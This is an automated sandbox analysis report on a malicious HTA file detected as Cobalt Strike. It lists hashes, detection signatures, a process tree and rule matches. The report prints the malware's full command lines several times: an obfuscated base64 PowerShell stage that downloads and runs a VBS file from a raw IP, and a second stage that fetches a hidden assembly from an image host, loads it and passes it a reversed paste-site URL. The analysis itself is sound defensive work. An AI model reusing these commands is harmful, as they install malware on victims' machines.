Edit tour

Windows Analysis Report
mniscreenthinkinggoodforentiretimegoodfotbusubessthings.hta

Overview

General Information

Sample name:	mniscreenthinkinggoodforentiretimegoodfotbusubessthings.hta
Analysis ID:	1578909
MD5:	4d74c4d1eddb79b92e94ef09f3437eaa
SHA1:	f7add01e161ef9b7093cf672afe052648dd457da
SHA256:	96df1f20a2f78ef6665f8acdf0e9576ac4f7879ec61f5e90d1fcb2ecbb310281
Tags:	htauser-abuse_ch
Infos:

Detection

Cobalt Strike

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected Cobalt Strike Beacon

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Sigma detected: Paste sharing url in reverse order

Sigma detected: Powershell download and load assembly

Suricata IDS alerts for network traffic

Yara detected Powershell download and execute

AI detected suspicious sample

Connects to a pastebin service (likely for C&C)

Loading BitLocker PowerShell Module

Potential malicious VBS script found (suspicious strings)

PowerShell case anomaly found

Sigma detected: Base64 Encoded PowerShell Command Detected

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands

Sigma detected: Potentially Suspicious PowerShell Child Processes

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Sigma detected: Suspicious MSHTA Child Process

Sigma detected: WScript or CScript Dropper

Suspicious command line found

Suspicious execution chain found

Suspicious powershell command line found

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Wscript starts Powershell (via cmd or directly)

Compiles C# or VB.Net code

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for the Microsoft Outlook file path

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: Usage Of Web Request Commands And Cmdlets

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara signature match

Classification

Process Tree

System is w10x64

mshta.exe (PID: 6684 cmdline: mshta.exe "C:\Users\user\Desktop\mniscreenthinkinggoodforentiretimegoodfotbusubessthings.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)

cmd.exe (PID: 6944 cmdline: "C:\Windows\system32\cmd.exe" "/C PoWErshELl -Ex byPaSs -Nop -w 1 -c DeVICECReDenTIAldEPloYMEnt ; inVOKE-eXPRESsion($(iNVOkE-exPrEssIon('[SYsTem.TeXt.EnCOdING]'+[char]58+[char]0X3a+'utf8.GEtSTrIng([SYSTEM.conveRT]'+[cHar]0X3A+[CHaR]58+'fROMbaSE64strIng('+[CHAr]34+'JDh3TTJ1VkQzTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC1UeXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1CRXJkRUZJTklUaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEpaZFBhRk1ERXlMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCUHNGc2JTUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlWWhZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBoRmJDZCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVFZBaVRZeHAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1lc3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdXpGVHJGRWwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkOHdNMnVWRDNNOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vNTcuMTI5LjU1LjIyNS8yMjUvZWNvbm9taWN0aGluZ3NhcmVnb2luZ2Fyb3VuZHdpdGhodXNiYW5kd2l0aGdvb2RuZXdzZ3JlYXRmb3JldmVyeWJvZHlnaXZlbi50SUYiLCIkZU5WOkFQUERBVEFcZWNvbm9taWN0aGluZ3NhcmVnb2luZ2Fyb3VuZHdpdGhodXNiYW5kd2l0aGdvb2RuZS52YnMiLDAsMCk7U3RBclQtU0xlRVAoMyk7aW5Wb0tFLUVYcHJlU3NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxlY29ub21pY3RoaW5nc2FyZWdvaW5nYXJvdW5kd2l0aGh1c2JhbmR3aXRoZ29vZG5lLnZicyI='+[ChaR]0x22+'))')))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7100 cmdline: PoWErshELl -Ex byPaSs -Nop -w 1 -c DeVICECReDenTIAldEPloYMEnt ; inVOKE-eXPRESsion($(iNVOkE-exPrEssIon('[SYsTem.TeXt.EnCOdING]'+[char]58+[char]0X3a+'utf8.GEtSTrIng([SYSTEM.conveRT]'+[cHar]0X3A+[CHaR]58+'fROMbaSE64strIng('+[CHAr]34+'JDh3TTJ1VkQzTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC1UeXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1CRXJkRUZJTklUaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEpaZFBhRk1ERXlMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCUHNGc2JTUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlWWhZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBoRmJDZCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVFZBaVRZeHAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1lc3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdXpGVHJGRWwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkOHdNMnVWRDNNOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vNTcuMTI5LjU1LjIyNS8yMjUvZWNvbm9taWN0aGluZ3NhcmVnb2luZ2Fyb3VuZHdpdGhodXNiYW5kd2l0aGdvb2RuZXdzZ3JlYXRmb3JldmVyeWJvZHlnaXZlbi50SUYiLCIkZU5WOkFQUERBVEFcZWNvbm9taWN0aGluZ3NhcmVnb2luZ2Fyb3VuZHdpdGhodXNiYW5kd2l0aGdvb2RuZS52YnMiLDAsMCk7U3RBclQtU0xlRVAoMyk7aW5Wb0tFLUVYcHJlU3NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxlY29ub21pY3RoaW5nc2FyZWdvaW5nYXJvdW5kd2l0aGh1c2JhbmR3aXRoZ29vZG5lLnZicyI='+[ChaR]0x22+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

csc.exe (PID: 3604 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\e0waei52\e0waei52.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)

cvtres.exe (PID: 4304 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA4B4.tmp" "c:\Users\user\AppData\Local\Temp\e0waei52\CSC9C05B393FD2448C976B42B57429CCF7.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)

wscript.exe (PID: 6036 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\economicthingsaregoingaroundwithhusbandwithgoodne.vbs" MD5: FF00E0480075B095948000BDC66E81F0)

powershell.exe (PID: 2492 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$antisiphonal = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg ';$orlage = New-Object System.Net.WebClient;$centralised = $orlage.DownloadData($antisiphonal);$slanshacks = [System.Text.Encoding]::UTF8.GetString($centralised);$commends = '<<BASE64_START>>';$Lemaitre = '<<BASE64_END>>';$ependymis = $slanshacks.IndexOf($commends);$transcolation = $slanshacks.IndexOf($Lemaitre);$ependymis -ge 0 -and $transcolation -gt $ependymis;$ependymis += $commends.Length;$scribblage = $transcolation - $ependymis;$dorsolumbar = $slanshacks.Substring($ependymis, $scribblage);$keltologist = -join ($dorsolumbar.ToCharArray() | ForEach-Object { $_ })[-1..-($dorsolumbar.Length)];$carinately = [System.Convert]::FromBase64String($keltologist);$brite = [System.Reflection.Assembly]::Load($carinately);$helygia = [dnlib.IO.Home].GetMethod('VAI');$helygia.Invoke($null, @('0/qvVum/r/ee.etsap//:sptth', 'creance', 'creance', 'creance', 'CasPol', 'creance', 'creance','creance','creance','creance','creance','creance','1','creance','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 2132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: wscript.exe PID: 6036	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 2492	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 2492	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x3b57f:$b2: ::FromBase64String( 0x3bc80:$b2: ::FromBase64String( 0x61ac6:$b2: ::FromBase64String( 0x7b3cc:$b2: ::FromBase64String( 0x8e666:$b2: ::FromBase64String( 0xabd4a:$b2: ::FromBase64String( 0xac44b:$b2: ::FromBase64String( 0x135654:$b2: ::FromBase64String( 0x135d55:$b2: ::FromBase64String( 0x179c66:$b2: ::FromBase64String( 0x17a367:$b2: ::FromBase64String( 0x9edc84:$b2: ::FromBase64String( 0x9ee37b:$b2: ::FromBase64String( 0xa59dbe:$b2: ::FromBase64String( 0xa6f477:$b2: ::FromBase64String( 0xba0328:$b2: ::FromBase64String( 0xba1223:$b2: ::FromBase64String( 0xba192c:$b2: ::FromBase64String( 0x3b389:$b3: ::UTF8.GetString( 0x3ba8a:$b3: ::UTF8.GetString( 0x7b1d6:$b3: ::UTF8.GetString(

Other

Source	Rule	Description	Author	Strings
amsi32_2492.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security

Sigma Signatures

Networking

Sigma detected: Paste sharing url in reverse order

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$antisiphonal = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg ';$orlage = New-Object System.Net.WebClient;$centralised = $orlage.DownloadData($antisiphonal);$slanshacks = [System.Text.Encoding]::UTF8.GetString($centralised);$commends = '<<BASE64_START>>';$Lemaitre = '<<BASE64_END>>';$ependymis = $slanshacks.IndexOf($commends);$transcolation = $slanshacks.IndexOf($Lemaitre);$ependymis -ge 0 -and $transcolation -gt $ependymis;$ependymis += $commends.Length;$scribblage = $transcolation - $ependymis;$dorsolumbar = $slanshacks.Substring($ependymis, $scribblage);$keltologist = -join ($dorsolumbar.ToCharArray() | ForEach-Object { $_ })[-1..-($dorsolumbar.Length)];$carinately = [System.Convert]::FromBase64String($keltologist);$brite = [System.Reflection.Assembly]::Load($carinately);$helygia = [dnlib.IO.Home].GetMethod('VAI');$helygia.Invoke($null, @('0/qvVum/r/ee.etsap//:sptth', 'creance', 'creance', 'creance', 'CasPol', 'creance', 'creance','creance','creance','creance','creance','creance','1','creance','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$antisiphonal = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg ';$orlage = New-Object System.Net.WebClient;$centralised = $orlage.DownloadData($antisiphonal);$slanshacks = [System.Text.Encoding]::UTF8.GetString($centralised);$commends = '<<BASE64_START>>';$Lemaitre = '<<BASE64_END>>';$ependymis = $slanshacks.IndexOf($commends);$transcolation = $slanshacks.IndexOf($Lemaitre);$ependymis -ge 0 -and $transcolation -gt $ependymis;$ependymis += $commends.Length;$scribblage = $transcolation - $ependymis;$dorsolumbar = $slanshacks.Substring($ependymis, $scribblage);$keltologist = -join ($dorsolumbar.ToCharArray() | ForEach-Object { $_ })[-1..-($dorsolumbar.Length)];$carinately = [System.Convert]::FromBase64String($keltologist);$b

System Summary

Sigma detected: Base64 Encoded PowerShell Command Detected

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$antisiphonal = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg ';$orlage = New-Object System.Net.WebClient;$centralised = $orlage.DownloadData($antisiphonal);$slanshacks = [System.Text.Encoding]::UTF8.GetString($centralised);$commends = '<<BASE64_START>>';$Lemaitre = '<<BASE64_END>>';$ependymis = $slanshacks.IndexOf($commends);$transcolation = $slanshacks.IndexOf($Lemaitre);$ependymis -ge 0 -and $transcolation -gt $ependymis;$ependymis += $commends.Length;$scribblage = $transcolation - $ependymis;$dorsolumbar = $slanshacks.Substring($ependymis, $scribblage);$keltologist = -join ($dorsolumbar.ToCharArray() | ForEach-Object { $_ })[-1..-($dorsolumbar.Length)];$carinately = [System.Convert]::FromBase64String($keltologist);$brite = [System.Reflection.Assembly]::Load($carinately);$helygia = [dnlib.IO.Home].GetMethod('VAI');$helygia.Invoke($null, @('0/qvVum/r/ee.etsap//:sptth', 'creance', 'creance', 'creance', 'CasPol', 'creance', 'creance','creance','creance','creance','creance','creance','1','creance','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$antisiphonal = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg ';$orlage = New-Object System.Net.WebClient;$centralised = $orlage.DownloadData($antisiphonal);$slanshacks = [System.Text.Encoding]::UTF8.GetString($centralised);$commends = '<<BASE64_START>>';$Lemaitre = '<<BASE64_END>>';$ependymis = $slanshacks.IndexOf($commends);$transcolation = $slanshacks.IndexOf($Lemaitre);$ependymis -ge 0 -and $transcolation -gt $ependymis;$ependymis += $commends.Length;$scribblage = $transcolation - $ependymis;$dorsolumbar = $slanshacks.Substring($ependymis, $scribblage);$keltologist = -join ($dorsolumbar.ToCharArray() | ForEach-Object { $_ })[-1..-($dorsolumbar.Length)];$carinately = [System.Convert]::FromBase64String($keltologist);$b

Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$antisiphonal = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg ';$orlage = New-Object System.Net.WebClient;$centralised = $orlage.DownloadData($antisiphonal);$slanshacks = [System.Text.Encoding]::UTF8.GetString($centralised);$commends = '<<BASE64_START>>';$Lemaitre = '<<BASE64_END>>';$ependymis = $slanshacks.IndexOf($commends);$transcolation = $slanshacks.IndexOf($Lemaitre);$ependymis -ge 0 -and $transcolation -gt $ependymis;$ependymis += $commends.Length;$scribblage = $transcolation - $ependymis;$dorsolumbar = $slanshacks.Substring($ependymis, $scribblage);$keltologist = -join ($dorsolumbar.ToCharArray() | ForEach-Object { $_ })[-1..-($dorsolumbar.Length)];$carinately = [System.Convert]::FromBase64String($keltologist);$brite = [System.Reflection.Assembly]::Load($carinately);$helygia = [dnlib.IO.Home].GetMethod('VAI');$helygia.Invoke($null, @('0/qvVum/r/ee.etsap//:sptth', 'creance', 'creance', 'creance', 'CasPol', 'creance', 'creance','creance','creance','creance','creance','creance','1','creance','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$antisiphonal = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg ';$orlage = New-Object System.Net.WebClient;$centralised = $orlage.DownloadData($antisiphonal);$slanshacks = [System.Text.Encoding]::UTF8.GetString($centralised);$commends = '<<BASE64_START>>';$Lemaitre = '<<BASE64_END>>';$ependymis = $slanshacks.IndexOf($commends);$transcolation = $slanshacks.IndexOf($Lemaitre);$ependymis -ge 0 -and $transcolation -gt $ependymis;$ependymis += $commends.Length;$scribblage = $transcolation - $ependymis;$dorsolumbar = $slanshacks.Substring($ependymis, $scribblage);$keltologist = -join ($dorsolumbar.ToCharArray() | ForEach-Object { $_ })[-1..-($dorsolumbar.Length)];$carinately = [System.Convert]::FromBase64String($keltologist);$b

Sigma detected: Potentially Suspicious PowerShell Child Processes

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\economicthingsaregoingaroundwithhusbandwithgoodne.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\economicthingsaregoingaroundwithhusbandwithgoodne.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: PoWErshELl -Ex byPaSs -Nop -w 1 -c DeVICECReDenTIAldEPloYMEnt ; inVOKE-eXPRESsion($(iNVOkE-exPrEssIon('[SYsTem.TeXt.EnCOdING]'+[char]58+[char]0X3a+'utf8.GEtSTrIng([SYSTEM.conveRT]'+[cHar]0X3A+[CHaR]58+'fROMbaSE64strIng('+[CHAr]34+'JDh3TTJ1VkQzTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC1UeXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1CRXJkRUZJTklUaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEpaZFBhRk1ERXlMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCUHNGc2JTUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlWWhZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBoRmJDZCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVFZBaVRZeHAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1lc3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdXpGVHJGRWwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkOHdNMnVWRDNNOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vNTcuMTI5LjU1LjIyNS8yMjUvZWNvbm9taWN0aGluZ3NhcmVnb2luZ2Fyb3VuZHdpdGhodXNiYW5kd2l0aGdvb2RuZXdzZ3JlYXRmb3JldmVyeWJvZHlnaXZlbi50SUYiLCIkZU5WOkFQUERBVEFcZWNvbm9taWN0aGluZ3NhcmVnb2luZ2Fyb3VuZHdpdGhodXNiYW5kd2l0aGdvb2RuZS52YnMiLDAsMCk7U3RBclQtU0xlRVAoMyk7aW5Wb0tFLUVYcHJlU3NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxlY29ub21pY3RoaW5nc2FyZWdvaW5nYXJvdW5kd2l0aGh1c2JhbmR3aXRoZ29vZG5lLnZicyI='+[ChaR]0x22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7100, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\economicthingsaregoingaroundwithhusbandwithgoodne.vbs" , ProcessId: 6036, ProcessName: wscript.exe

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Source: Process started

Sigma detected: Suspicious MSHTA Child Process

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\system32\cmd.exe" "/C PoWErshELl -Ex byPaSs -Nop -w 1 -c DeVICECReDenTIAldEPloYMEnt ; inVOKE-eXPRESsion($(iNVOkE-exPrEssIon('[SYsTem.TeXt.EnCOdING]'+[char]58+[char]0X3a+'utf8.GEtSTrIng([SYSTEM.conveRT]'+[cHar]0X3A+[CHaR]58+'fROMbaSE64strIng('+[CHAr]34+'JDh3TTJ1VkQzTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC1UeXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1CRXJkRUZJTklUaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEpaZFBhRk1ERXlMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCUHNGc2JTUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlWWhZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBoRmJDZCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVFZBaVRZeHAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1lc3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdXpGVHJGRWwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkOHdNMnVWRDNNOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vNTcuMTI5LjU1LjIyNS8yMjUvZWNvbm9taWN0aGluZ3NhcmVnb2luZ2Fyb3VuZHdpdGhodXNiYW5kd2l0aGdvb2RuZXdzZ3JlYXRmb3JldmVyeWJvZHlnaXZlbi50SUYiLCIkZU5WOkFQUERBVEFcZWNvbm9taWN0aGluZ3NhcmVnb2luZ2Fyb3VuZHdpdGhodXNiYW5kd2l0aGdvb2RuZS52YnMiLDAsMCk7U3RBclQtU0xlRVAoMyk7aW5Wb0tFLUVYcHJlU3NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxlY29ub21pY3RoaW5nc2FyZWdvaW5nYXJvdW5kd2l0aGh1c2JhbmR3aXRoZ29v